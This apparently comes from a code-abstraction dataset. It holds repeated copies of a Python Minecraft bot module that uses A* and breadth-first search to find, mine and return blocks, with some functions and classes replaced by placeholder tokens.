xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n <function token>\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n <function token>\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass 